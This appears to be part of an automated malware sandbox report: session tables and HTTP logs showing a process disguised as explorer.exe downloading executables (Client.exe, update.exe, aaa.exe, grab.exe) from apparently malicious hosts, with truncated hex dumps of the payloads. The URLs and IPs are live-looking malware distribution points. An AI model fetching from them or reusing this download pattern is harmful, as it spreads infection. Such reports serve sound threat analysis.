Jul 6, 2024 13:27:18.630759001 CEST	1236	IN	Data Raw: 6f 16 00 00 0a 26 38 ce 00 00 00 09 1f 0d 6f 16 00 00 0a 26 38 c0 00 00 00 09 1f 0a 6f 16 00 00 0a 26 38 b2 00 00 00 09 1e 6f 16 00 00 0a 26 38 a5 00 00 00 09 1f 0c 6f 16 00 00 0a 26 38 97 00 00 00 02 08 17 58 1a 6f 20 00 00 0a 13 09 09 11 09 20 Data Ascii: o&8o&8o&8o&8o&8Xo (!o&X+qo&+f~,A-=Xo/2Xo/3%X%o/6o.+o3+oo&+oo&Xo?K,rps
Jul 6, 2024 13:27:18.630779982 CEST	1236	IN	Data Raw: 00 04 6f 31 00 00 0a 0d 02 09 6f 18 00 00 06 6f 34 00 00 0a 7d 24 00 00 04 02 1f fc 7d 1f 00 00 04 2b 28 02 7b 24 00 00 04 6f 31 00 00 0a 13 04 02 11 04 7d 20 00 00 04 02 17 7d 1f 00 00 04 17 0a de 47 02 1f fc 7d 1f 00 00 04 02 7b 24 00 00 04 6f Data Ascii: o1oo4}$}+({$o1} }G}{$o0-(j}${#o0-(i}#(gn}{#,{#o/r}{$,{$o/{ s2z{ *
Jul 6, 2024 13:27:18.630841970 CEST	1236	IN	Data Raw: 04 2a 1a 73 32 00 00 0a 7a 00 1e 02 7b 28 00 00 04 2a 13 30 02 00 37 00 00 00 11 00 00 11 02 7b 27 00 00 04 1f fe 33 18 02 7b 29 00 00 04 28 2d 00 00 0a 33 0b 02 16 7d 27 00 00 04 02 0a 2b 13 16 73 81 00 00 06 0a 06 02 7b 2a 00 00 04 7d 2a 00 00 Data Ascii: s2z{(07{'3{)(-3}'+s{}({-"}-*F{,oBsG{,oC,{,oDs(;,({,oC,{,oE{,oF0)
Jul 6, 2024 13:27:18.630865097 CEST	1236	IN	Data Raw: 00 00 0a 00 00 11 02 7b 2f 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 a3 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 02 00 93 00 00 00 18 00 00 11 02 7b 2f 00 00 04 0b 02 7b 32 00 00 04 0c 07 2c 08 07 17 2e Data Ascii: {/.3(0{/{2,.Jx}/{,oB}3}/+,\|3('(}0}/2}/\|3()-(\|3(f}/\|3
Jul 6, 2024 13:27:18.630945921 CEST	1236	IN	Data Raw: 2a 00 0a 17 2a 00 13 30 01 00 0a 00 00 00 1a 00 00 11 12 00 fe 15 05 00 00 02 06 2a 00 00 1a 72 4f 00 00 70 2a 00 06 2a 00 00 0a 16 2a 00 06 2a 00 00 1a 28 d0 00 00 06 2a 00 42 02 03 33 02 17 2a 03 75 14 00 00 02 14 fe 03 2a 00 00 00 0a 16 2a 00 Data Ascii: *0rOp***(B3u6rOpo&Fs78*0V(C}9}:V(C}9}:{:-{9o+{9{:o
Jul 6, 2024 13:27:18.630958080 CEST	1236	IN	Data Raw: 00 00 04 7e 3e 00 00 04 6f 50 03 00 06 80 3e 00 00 04 7e 4a 00 00 04 7e 3f 00 00 04 6f 50 03 00 06 80 3f 00 00 04 7e 4a 00 00 04 7e 40 00 00 04 6f 50 03 00 06 80 40 00 00 04 7e 4a 00 00 04 7e 41 00 00 04 6f 50 03 00 06 80 41 00 00 04 7e 4a 00 00 Data Ascii: ~>oP>~J~?oP?~J~@oP@~J~AoPA~J~EoPE~J~KoPK~J~IoPI~J~LoPL~J~OoPO(M~J~GoPG~J~FoP(`sbH(
Jul 6, 2024 13:27:18.635445118 CEST	1236	IN	Data Raw: 00 0a 00 00 00 00 00 00 00 00 4a 4a 00 03 02 00 00 01 1b 30 03 00 d1 00 00 00 20 00 00 11 28 83 00 00 0a 7e 55 00 00 04 25 2d 17 26 7e 54 00 00 04 fe 06 16 01 00 06 73 84 00 00 0a 25 80 55 00 00 04 28 09 00 00 2b 7e 56 00 00 04 25 2d 17 26 7e 54 Data Ascii: JJ0 (~U%-&~Ts%U(+~V%-&~Ts%V(+~W%-&~Ts%W(+~X%-&~Ts%X(+~Y%-&~Ts%Y(+(+o&rf$p**

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:18.962368965 CEST	141	OUT	GET /Client.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:19.564568043 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:19 GMT content-type: application/x-msdownload content-length: 328192 server: nginx last-modified: Tue, 02 Jul 2024 17:49:14 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 3e b0 62 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f6 04 00 00 0a 00 00 00 00 00 00 1e 15 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 14 05 00 4f 00 00 00 00 20 05 00 16 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>b"0 @ ``O @ H.text$ `.rsrc @@.reloc@@BHtXZ@oqwypO rPWS[QYUA]@PXT!\ RZV`PWS[QYUa]`PXT1\0RZV` [TRUNCATED]
Jul 6, 2024 13:27:19.564651966 CEST	224	IN	Data Raw: 00 00 09 00 00 00 06 00 00 00 0a 00 00 00 05 00 00 00 0b 00 00 00 04 00 00 00 0c 00 00 00 03 00 00 00 0d 00 00 00 02 00 00 00 0e 00 00 00 01 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 Data Ascii: (08@P`p
Jul 6, 2024 13:27:19.564661980 CEST	1236	IN	Data Raw: 0a 0a 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d Data Ascii:
Jul 6, 2024 13:27:19.564717054 CEST	1236	IN	Data Raw: 05 00 1a 00 05 00 06 00 05 00 16 00 05 00 0e 00 05 00 1e 00 05 00 01 00 05 00 11 00 05 00 09 00 05 00 19 00 05 00 05 00 05 00 15 00 05 00 0d 00 05 00 1d 00 05 00 03 00 05 00 13 00 05 00 0b 00 05 00 1b 00 05 00 07 00 05 00 17 00 05 00 03 00 00 00 Data Ascii: #+3;CScshttps://githu
Jul 6, 2024 13:27:19.564728022 CEST	448	IN	Data Raw: 00 00 07 00 00 00 00 00 00 00 08 00 00 00 5a 00 00 00 00 00 00 00 08 00 00 00 1a 00 00 00 00 00 00 00 09 00 00 00 94 00 00 00 54 00 00 00 07 00 00 00 43 00 00 00 00 00 00 00 08 00 00 00 7a 00 00 00 00 00 00 00 08 00 00 00 3a 00 00 00 00 00 00 00 Data Ascii: ZTCz:Rj*JPVS3
Jul 6, 2024 13:27:19.564738035 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 08 00 00 00 3e 00 00 00 00 00 00 00 09 00 00 00 dc 00 00 00 52 00 00 00 07 00 00 00 1b 00 00 00 00 00 00 00 08 00 00 00 6e 00 00 00 00 00 00 00 08 00 00 00 2e 00 00 00 00 00 00 00 09 00 00 00 bc 00 00 00 00 00 00 00 08 00 00 00 Data Ascii: >Rn.N`QURq1Pa
Jul 6, 2024 13:27:19.564749002 CEST	224	IN	Data Raw: 00 00 00 00 00 00 08 00 00 00 8b 00 00 00 00 00 00 00 08 00 00 00 4b 00 00 00 00 00 00 00 09 00 00 00 f6 00 00 00 50 00 00 00 07 00 00 00 05 00 00 00 00 00 00 00 08 00 00 00 57 00 00 00 00 00 00 00 08 00 00 00 17 00 00 00 c0 00 00 00 08 00 00 00 Data Ascii: KPWS3w7Qg'G
Jul 6, 2024 13:27:19.564762115 CEST	1236	IN	Data Raw: 00 00 ee 00 00 00 50 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00 08 00 00 00 5f 00 00 00 00 00 00 00 08 00 00 00 1f 00 00 00 00 00 00 00 09 00 00 00 9e 00 00 00 54 00 00 00 07 00 00 00 63 00 00 00 00 00 00 00 08 00 00 00 7f 00 00 00 00 00 00 00 Data Ascii: P_Tc?Ro/O`PTs
Jul 6, 2024 13:27:19.564816952 CEST	1236	IN	Data Raw: 00 00 3a 00 00 00 00 00 00 00 09 00 00 00 d5 00 00 00 52 00 00 00 07 00 00 00 13 00 00 00 00 00 00 00 08 00 00 00 6a 00 00 00 00 00 00 00 08 00 00 00 2a 00 00 00 00 00 00 00 09 00 00 00 b5 00 00 00 00 00 00 00 08 00 00 00 0a 00 00 00 00 00 00 00 Data Ascii: :Rj*JPVS3v6Qf&
Jul 6, 2024 13:27:19.564829111 CEST	1236	IN	Data Raw: 00 00 8d 00 00 00 00 00 00 00 08 00 00 00 4d 00 00 00 00 00 00 00 09 00 00 00 fb 00 00 00 50 00 00 00 07 00 00 00 03 00 00 00 00 00 00 00 08 00 00 00 53 00 00 00 00 00 00 00 08 00 00 00 13 00 00 00 55 00 00 00 08 00 00 00 c3 00 00 00 53 00 00 00 Data Ascii: MPSUS#s3Qc#CP[
Jul 6, 2024 13:27:19.569591045 CEST	1236	IN	Data Raw: 08 00 06 00 08 00 86 00 08 00 46 00 08 00 c6 00 08 00 26 00 08 00 a6 00 08 00 66 00 08 00 e6 00 08 00 16 00 08 00 96 00 08 00 56 00 08 00 d6 00 08 00 36 00 08 00 b6 00 08 00 76 00 08 00 f6 00 08 00 0e 00 08 00 8e 00 08 00 4e 00 08 00 ce 00 08 00 Data Ascii: F&fV6vN.n^>~A!aQ1qI)iY9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:20.471851110 CEST	141	OUT	GET /update.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:21.049598932 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:20 GMT content-type: application/x-msdownload content-length: 48640 server: nginx last-modified: Wed, 03 Jul 2024 05:25:35 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL-eN @ @W H.textT `.rsrc@@.reloc@B0HYvV;$0xC=VDb9A./\(~~~~~~~~~~~**(>2~o?.s():((:(+:(':((9(vV(s on~9~o~~(9(09(@VrN%p~(o#s%r!po [TRUNCATED]
Jul 6, 2024 13:27:21.049614906 CEST	1236	IN	Data Raw: 00 70 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 20 e8 03 00 00 28 14 00 00 0a 2a da 73 94 00 00 06 25 72 02 21 00 70 6f 7f 00 00 06 72 0c 26 00 70 6f 8c 00 00 06 25 72 0c 26 00 70 6f 7f 00 00 06 02 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 Data Ascii: poo( (s%r!por&po%r&pooo( .s$^(o(M(^(((Oob D%-(,2~.o2~.o2((XD%%c%c%c
Jul 6, 2024 13:27:21.049626112 CEST	1236	IN	Data Raw: 00 00 20 88 13 00 00 28 14 00 00 0a 2b d4 00 00 00 01 1c 00 00 00 00 33 00 60 93 00 06 01 00 00 01 00 00 9a 00 19 b3 00 06 01 00 00 01 1b 30 02 00 2d 01 00 00 02 00 00 11 28 19 00 00 0a 7e 07 00 00 04 28 1a 00 00 0a 6f 1b 00 00 0a 80 07 00 00 04 Data Ascii: (+3`0-(~(o~sK~~oN~~oN~~oN~~oN~~oN~~oN~~oN~~
Jul 6, 2024 13:27:21.049675941 CEST	1236	IN	Data Raw: 0c 00 00 06 d4 8d 44 00 00 01 28 0b 00 00 06 16 6a 28 0f 00 00 06 28 2f 00 00 06 28 20 00 00 06 16 28 18 00 00 06 16 28 1a 00 00 06 14 fe 06 21 00 00 06 73 3a 00 00 0a 14 73 27 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 32 00 00 0a 73 27 00 00 0a Data Ascii: D(j((/( ((!s:s' ' :o2s' ' :o2s;("s:s;((((i(is<o=&8(&(*AL&!
Jul 6, 2024 13:27:21.049685955 CEST	1236	IN	Data Raw: 6f 7f 00 00 06 72 10 21 00 70 6f 8c 00 00 06 25 72 1a 21 00 70 6f 7f 00 00 06 28 35 00 00 06 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 28 51 00 00 0a 17 28 1a 00 00 06 dd 06 00 00 00 26 dd 00 00 00 00 2a 01 10 00 00 00 00 00 00 49 49 00 06 01 Data Ascii: or!po%r!po(5oo( (Q(&II0,(9(9(X(&%%0v~(R~(SsT(UoVoWoX(Y9/(Z8;
Jul 6, 2024 13:27:21.049695969 CEST	1236	IN	Data Raw: 0a 39 08 00 00 00 17 13 05 dd 4e 00 00 00 08 6f 85 00 00 0a 3a 6a ff ff ff dd 0d 00 00 00 08 39 06 00 00 00 08 6f 33 00 00 0a dc dd 0d 00 00 00 07 39 06 00 00 00 07 6f 33 00 00 0a dc dd 0d 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc dd 06 00 Data Ascii: 9No:j9o39o39o3&*40%(Uo(;&&0/rn#p(:(
Jul 6, 2024 13:27:21.049709082 CEST	1236	IN	Data Raw: dd 31 00 00 00 72 48 25 00 70 07 6f a5 00 00 0a 28 a6 00 00 0a 13 04 dd 1a 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc 26 72 40 25 00 70 13 04 dd 00 00 00 00 11 04 2a 01 28 00 00 02 00 31 00 2f 60 00 0d 00 00 00 00 02 00 1f 00 7c 9b 00 0d 00 Data Ascii: 1rH%po(9o3&r@%p(1/`\|09(8$oo(9Xi20 (<&&0@ s
Jul 6, 2024 13:27:21.049774885 CEST	108	IN	Data Raw: 7f 00 00 06 6f 7a 00 00 06 28 41 00 00 06 26 7e 24 00 00 04 28 01 00 00 2b 6f bb 00 00 0a 0c 38 44 00 00 00 12 02 28 bc 00 00 0a 0d 09 72 90 25 00 70 6f 7f 00 00 06 6f 8b 00 00 06 06 72 bc 25 00 70 6f 7f 00 00 06 6f 8b 00 00 06 28 25 00 00 0a 39 Data Ascii: oz(A&~$(+o8D(r%poor%poo(%9(G~$o&(
Jul 6, 2024 13:27:21.050611973 CEST	1236	IN	Data Raw: 00 00 0a 2d b3 dd 0e 00 00 00 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a dc dd 0f 00 00 00 6f b3 00 00 0a 28 49 00 00 06 dd 00 00 00 00 2a 41 4c 00 00 00 00 00 00 a4 00 00 00 79 00 00 00 1d 01 00 00 0f 00 00 00 31 00 00 01 02 00 00 00 62 01 00 00 57 Data Ascii: -o3o(I*ALy1bW10(r%poo(B(or%po(~%: r%p(~%(%(
Jul 6, 2024 13:27:21.050687075 CEST	1236	IN	Data Raw: 00 a9 00 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 e2 00 00 00 42 00 00 00 24 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 1e 00 00 00 15 01 00 00 33 01 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 18 00 00 00 28 01 00 00 40 01 00 00 0d 00 00 00 00 Data Ascii: B$3(@0"8;Xi2*0n(oso9o3s8r&p(o&Xi2
Jul 6, 2024 13:27:21.054711103 CEST	1236	IN	Data Raw: 38 00 00 00 49 00 00 00 5a 00 00 00 38 66 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 f0 00 00 0a 2a 02 7b 35 00 00 04 a5 95 00 00 01 2a 02 7b 35 00 00 04 6f 38 00 00 0a 6f f1 00 00 0a 28 f2 00 00 0a 2a 02 7b 35 00 00 04 a5 96 00 00 01 28 f3 00 Data Ascii: 8IZ8f{5h({5{5o8o({5({5({5k(j0 {6YE"k8IZ8f{5h{5h({5o8o({5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:21.298449993 CEST	141	OUT	GET /update.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:21.850368977 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:21 GMT content-type: application/x-msdownload content-length: 48640 server: nginx last-modified: Wed, 03 Jul 2024 05:25:35 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL-eN @ @W H.textT `.rsrc@@.reloc@B0HYvV;$0xC=VDb9A./\(~~~~~~~~~~~**(>2~o?.s():((:(+:(':((9(vV(s on~9~o~~(9(09(@VrN%p~(o#s%r!po [TRUNCATED]
Jul 6, 2024 13:27:21.850387096 CEST	1236	IN	Data Raw: 00 70 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 20 e8 03 00 00 28 14 00 00 0a 2a da 73 94 00 00 06 25 72 02 21 00 70 6f 7f 00 00 06 72 0c 26 00 70 6f 8c 00 00 06 25 72 0c 26 00 70 6f 7f 00 00 06 02 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 Data Ascii: poo( (s%r!por&po%r&pooo( .s$^(o(M(^(((Oob D%-(,2~.o2~.o2((XD%%c%c%c
Jul 6, 2024 13:27:21.850399017 CEST	1236	IN	Data Raw: 00 00 20 88 13 00 00 28 14 00 00 0a 2b d4 00 00 00 01 1c 00 00 00 00 33 00 60 93 00 06 01 00 00 01 00 00 9a 00 19 b3 00 06 01 00 00 01 1b 30 02 00 2d 01 00 00 02 00 00 11 28 19 00 00 0a 7e 07 00 00 04 28 1a 00 00 0a 6f 1b 00 00 0a 80 07 00 00 04 Data Ascii: (+3`0-(~(o~sK~~oN~~oN~~oN~~oN~~oN~~oN~~oN~~
Jul 6, 2024 13:27:21.850508928 CEST	672	IN	Data Raw: 0c 00 00 06 d4 8d 44 00 00 01 28 0b 00 00 06 16 6a 28 0f 00 00 06 28 2f 00 00 06 28 20 00 00 06 16 28 18 00 00 06 16 28 1a 00 00 06 14 fe 06 21 00 00 06 73 3a 00 00 0a 14 73 27 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 32 00 00 0a 73 27 00 00 0a Data Ascii: D(j((/( ((!s:s' ' :o2s' ' :o2s;("s:s;((((i(is<o=&8(&(*AL&!
Jul 6, 2024 13:27:21.850527048 CEST	1236	IN	Data Raw: 28 0c 00 00 06 16 6a 30 98 14 fe 06 46 00 00 06 73 46 00 00 0a 73 47 00 00 0a 28 0a 00 00 06 6f 48 00 00 0a 16 6a 28 0f 00 00 06 1a 6a 28 0d 00 00 06 28 0c 00 00 06 d4 8d 44 00 00 01 28 0b 00 00 06 38 3a 00 00 00 1a 6a 28 0d 00 00 06 28 0c 00 00 Data Ascii: (j0FsFsG(oHj(j((D(8:j((D(j(8(j<(E(((i(is<o=&8(&(*A0(
Jul 6, 2024 13:27:21.850537062 CEST	1236	IN	Data Raw: 00 00 0a 28 6f 00 00 0a 6f 71 00 00 0a 11 09 72 80 22 00 70 11 08 28 73 00 00 0a 72 8c 22 00 70 28 68 00 00 0a 6f 71 00 00 0a dd 0f 00 00 00 11 09 39 07 00 00 00 11 09 6f 33 00 00 0a dc 73 5c 00 00 0a 25 11 08 6f 5d 00 00 0a 25 17 6f 63 00 00 0a Data Ascii: (ooqr"p(sr"p(hoq9o3s\%o]%oc%ot%ou%ob(d&(&*AdQ(y,Gl&oo10:!
Jul 6, 2024 13:27:21.850548983 CEST	1236	IN	Data Raw: 0a 72 e6 23 00 70 72 f0 23 00 70 6f 95 00 00 0a 72 fc 23 00 70 72 08 24 00 70 6f 95 00 00 0a 28 68 00 00 0a 6f 8c 00 00 06 25 72 14 24 00 70 6f 7f 00 00 06 28 98 00 00 0a 6f 8c 00 00 06 25 72 1e 24 00 70 6f 7f 00 00 06 7e 03 00 00 04 6f 8c 00 00 Data Ascii: r#pr#por#pr$po(ho%r$po(o%r$po~o%r.$po(0(o}r:$pr.$porD$pr#poo%rP$po(5o%rh$po~o%rz$po(2o%r$po(sT((
Jul 6, 2024 13:27:21.850560904 CEST	672	IN	Data Raw: 0d 00 00 00 00 00 00 00 00 2f 2f 00 0f 31 00 00 01 1b 30 02 00 3e 00 00 00 11 00 00 11 7e 65 00 00 0a 7e 23 00 00 04 6f b4 00 00 0a 0a 06 02 6f b6 00 00 0a 17 0b dd 1e 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc 6f b3 00 00 0a 28 49 00 00 06 Data Ascii: //10>~e~#oo9o3o(I++10C~er po~#o9o3o(I#0010s
Jul 6, 2024 13:27:21.850677967 CEST	1236	IN	Data Raw: 00 00 0a 2d b3 dd 0e 00 00 00 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a dc dd 0f 00 00 00 6f b3 00 00 0a 28 49 00 00 06 dd 00 00 00 00 2a 41 4c 00 00 00 00 00 00 a4 00 00 00 79 00 00 00 1d 01 00 00 0f 00 00 00 31 00 00 01 02 00 00 00 62 01 00 00 57 Data Ascii: -o3o(I*ALy1bW10(r%poo(B(or%po(~%: r%p(~%(%(
Jul 6, 2024 13:27:21.850691080 CEST	1236	IN	Data Raw: 00 a9 00 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 e2 00 00 00 42 00 00 00 24 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 1e 00 00 00 15 01 00 00 33 01 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 18 00 00 00 28 01 00 00 40 01 00 00 0d 00 00 00 00 Data Ascii: B$3(@0"8;Xi2*0n(oso9o3s8r&p(o&Xi2
Jul 6, 2024 13:27:21.855422020 CEST	1236	IN	Data Raw: 38 00 00 00 49 00 00 00 5a 00 00 00 38 66 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 f0 00 00 0a 2a 02 7b 35 00 00 04 a5 95 00 00 01 2a 02 7b 35 00 00 04 6f 38 00 00 0a 6f f1 00 00 0a 28 f2 00 00 0a 2a 02 7b 35 00 00 04 a5 96 00 00 01 28 f3 00 Data Ascii: 8IZ8f{5h({5{5o8o({5({5({5k(j0 {6YE"k8IZ8f{5h{5h({5o8o({5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	75.119.203.100	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:23.256465912 CEST	182	OUT	GET /wp-admin/css/colors/ocean/grab.exe HTTP/1.1 Host: www.westnilebirdingandsafari.com Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:23.871161938 CEST	542	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 06 Jul 2024 11:27:23 GMT Server: Apache Location: https://www.westnilebirdingandsafari.com/wp-admin/css/colors/ocean/grab.exe Content-Length: 283 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 73 74 6e 69 6c 65 62 69 72 64 69 6e 67 61 6e 64 73 61 66 61 72 69 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 63 6f 6c 6f 72 73 2f 6f 63 65 61 6e 2f 67 72 61 62 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.westnilebirdingandsafari.com/wp-admin/css/colors/ocean/grab.exe">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:23.876923084 CEST	138	OUT	GET /aaa.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
